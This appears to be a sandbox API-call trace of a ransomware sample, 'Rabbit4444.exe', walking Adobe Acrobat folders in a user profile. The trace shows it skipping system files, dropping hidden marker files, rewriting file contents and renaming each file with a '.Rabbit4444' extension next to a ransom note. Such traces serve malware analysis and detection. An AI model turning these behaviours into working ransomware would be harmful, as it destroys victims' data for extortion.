[0054.489] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.489] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xdfb20735, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xdfb20735, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.490] lstrcmpiW (lpString1="DC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="Rabbit4444.exe") returned -1 [0054.490] lstrcmpiW (lpString1="DC", lpString2=".") returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="..") returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="windows") returned -1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="bootmgr") returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="pagefile.sys") returned -1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="boot") returned 1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="ids.txt") returned -1 [0054.490] lstrcmpiW (lpString1="DC", lpString2="NTUSER.DAT") returned -1 [0054.490] lstrcpyW (in: lpString1=0x130eb96, lpString2="DC" | out: lpString1="DC") returned="DC" [0054.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x1208e8 [0054.490] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6510 [0054.490] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xdfb20735, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xdfb20735, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 0 [0054.490] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.490] lstrcpyW (in: lpString1=0x130eb96, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.490] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.491] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.491] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.491] CloseHandle (hObject=0x278) returned 1 [0054.491] CloseHandle (hObject=0x27c) returned 1 [0054.491] GetCurrentThreadId () returned 0xd98 [0054.491] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.491] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC" [0054.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1208e8 | out: hHeap=0xe0000) returned 1 [0054.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.491] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC" [0054.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\" [0054.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" [0054.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.492] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.495] FlushFileBuffers (hFile=0x27c) returned 1 [0054.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.496] CloseHandle (hObject=0x27c) returned 1 [0054.497] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC") returned 49 [0054.497] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xdff10de7, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.497] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.497] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.497] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.497] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.497] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xdff10de7, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.497] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.497] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.497] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.497] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.497] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.497] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cd766d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cd766d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.497] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.497] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a7ce5b7, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a7ce5b7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5a7ce5b7, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="assets", cAlternateFileName="")) returned 1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="Rabbit4444.exe") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2=".") returned 1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="..") returned 1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="windows") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="bootmgr") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="pagefile.sys") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="boot") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="ids.txt") returned -1 [0054.497] lstrcmpiW (lpString1="assets", lpString2="NTUSER.DAT") returned -1 [0054.498] lstrcpyW (in: lpString1=0x130eb9c, lpString2="assets" | out: lpString1="assets") returned="assets" [0054.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0054.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10df68 [0054.498] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6510 [0054.498] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x744227d1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x744227d1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xdfed8af5, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="Rabbit4444.exe") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2=".") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="..") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="windows") returned -1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="bootmgr") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="pagefile.sys") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="boot") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="ids.txt") returned 1 [0054.498] lstrcmpiW (lpString1="ReaderMessages", lpString2="NTUSER.DAT") returned 1 [0054.498] lstrcpyW (in: lpString1=0x130eb9c, lpString2="ReaderMessages" | out: lpString1="ReaderMessages") returned="ReaderMessages" [0054.498] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\ReaderMessages", dwFileAttributes=0x2000) returned 1 [0054.499] lstrlenW (lpString="ReaderMessages") returned 14 [0054.499] lstrlenW (lpString="Rabbit4444") returned 10 [0054.499] lstrcmpiW (lpString1="erMessages", lpString2="Rabbit4444") returned -1 [0054.499] lstrlenW (lpString=".dll") returned 4 [0054.499] lstrcmpiW (lpString1="ages", lpString2=".dll") returned 1 [0054.499] lstrlenW (lpString=".lnk") returned 4 [0054.499] lstrcmpiW (lpString1="ages", lpString2=".lnk") returned 1 [0054.499] lstrlenW (lpString=".ini") returned 4 [0054.499] lstrcmpiW (lpString1="ages", lpString2=".ini") returned 1 [0054.499] lstrlenW (lpString=".sys") returned 4 [0054.499] lstrcmpiW (lpString1="ages", lpString2=".sys") returned 1 [0054.499] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\ReaderMessages" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\readermessages"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.499] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.500] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14581029310) returned 1 [0054.500] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=39936) returned 1 [0054.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0054.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0054.500] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9f00, lpName=0x0) returned 0x298 [0054.501] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9f00) returned 0x70000 [0054.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0054.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0054.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0054.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0054.504] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14581463965) returned 1 [0054.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0054.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0054.504] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.504] CloseHandle (hObject=0x298) returned 1 [0054.504] CloseHandle (hObject=0x278) returned 1 [0054.504] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\ReaderMessages.Rabbit4444") returned 75 [0054.505] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\ReaderMessages" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\readermessages"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\ReaderMessages.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\readermessages.rabbit4444"), dwFlags=0x1) returned 1 [0054.505] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x529c222b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x529c222b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x529c222b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="Rabbit4444.exe") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2=".") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="..") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="windows") returned -1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="bootmgr") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="pagefile.sys") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="boot") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="ids.txt") returned 1 [0054.505] lstrcmpiW (lpString1="Search", lpString2="NTUSER.DAT") returned 1 [0054.505] lstrcpyW (in: lpString1=0x130eb9c, lpString2="Search" | out: lpString1="Search") returned="Search" [0054.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0054.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10e768 [0054.505] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6670 [0054.505] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x529c222b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x529c222b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x529c222b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0054.505] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.506] lstrcpyW (in: lpString1=0x130eb9c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.507] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.507] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.508] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.508] CloseHandle (hObject=0x278) returned 1 [0054.508] CloseHandle (hObject=0x27c) returned 1 [0054.508] GetCurrentThreadId () returned 0xd98 [0054.508] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0054.508] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search" [0054.509] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e768 | out: hHeap=0xe0000) returned 1 [0054.509] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0054.509] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search" [0054.509] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\" [0054.509] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\.BFC0E91B00AE8A0620D3" [0054.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\search\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.512] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.515] FlushFileBuffers (hFile=0x27c) returned 1 [0054.516] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.517] CloseHandle (hObject=0x27c) returned 1 [0054.517] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search") returned 56 [0054.517] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.517] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x529c222b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x529c222b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cfd944, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0054.517] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.517] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.517] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.517] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.517] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x529c222b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x529c222b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cfd944, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.517] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.517] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.517] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.518] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.518] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.518] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cfd944, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cfd944, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.518] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.518] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.518] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cfd944, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cfd944, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 